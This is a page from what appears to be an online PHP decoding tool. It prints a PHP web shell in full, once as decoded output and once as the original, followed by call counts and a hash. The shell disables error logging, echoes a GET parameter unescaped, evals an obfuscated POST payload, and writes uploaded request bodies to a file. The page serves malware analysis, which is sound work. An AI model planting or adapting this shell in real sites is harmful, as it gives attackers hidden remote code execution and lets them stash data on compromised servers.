Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

/* * * I found this shell at 2013-02-18 * * This shell disables logging and error..

Decoded Output download

/* 
 * 
 *	I found this shell at 2013-02-18  
 * 
 *	This shell disables logging and error reporting and allows for XSS, 
 *	command execution (the command is also obfuscated), 
 *	and file uploads. 
 */ 
<?php  
@error_reporting(0); 
@ini_set("display_errors",0); 
@ini_set("log_errors",0); 
@ini_set("error_log",0); 
if (isset($_GET['r'])) { 
	print $_GET['r']; 
} elseif (isset($_POST['e'])) { 
	eval(base64_decode(str_rot13(strrev(base64_decode(str_rot13($_POST['e'])))))); 
} elseif (isset($_SERVER['HTTP_CONTENT_ENCODING']) && $_SERVER['HTTP_CONTENT_ENCODING'] == 'binary') { 
	$data = file_get_contents('php://input'); 
	if (strlen($data) > 0) 
		print 'STATUS-IMPORT-OK'; 
	if (strlen($data) > 12) { 
		$fp=@fopen('tmpfile','a'); 
		@flock($fp, LOCK_EX); 
		@fputs($fp, $_SERVER['REMOTE_ADDR']."	".base64_encode($data)."
"); 
		@flock($fp, LOCK_UN); 
		@fclose($fp); 
	} 
} exit; 
?>

Did this file decode correctly?

Original Code

/*
 *
 *	I found this shell at 2013-02-18 
 *
 *	This shell disables logging and error reporting and allows for XSS,
 *	command execution (the command is also obfuscated),
 *	and file uploads.
 */
<?php 
@error_reporting(0);
@ini_set("display_errors",0);
@ini_set("log_errors",0);
@ini_set("error_log",0);
if (isset($_GET['r'])) {
	print $_GET['r'];
} elseif (isset($_POST['e'])) {
	eval(base64_decode(str_rot13(strrev(base64_decode(str_rot13($_POST['e']))))));
} elseif (isset($_SERVER['HTTP_CONTENT_ENCODING']) && $_SERVER['HTTP_CONTENT_ENCODING'] == 'binary') {
	$data = file_get_contents('php://input');
	if (strlen($data) > 0)
		print 'STATUS-IMPORT-OK';
	if (strlen($data) > 12) {
		$fp=@fopen('tmpfile','a');
		@flock($fp, LOCK_EX);
		@fputs($fp, $_SERVER['REMOTE_ADDR']."\t".base64_encode($data)."\r\n");
		@flock($fp, LOCK_UN);
		@fclose($fp);
	}
} exit;
?>

Function Calls

ini_set 3
error_reporting 1

Variables

None

Stats

MD5 9ce8a9376e5e81d67407005a627e8de9
Eval Count 0
Decode Time 107 ms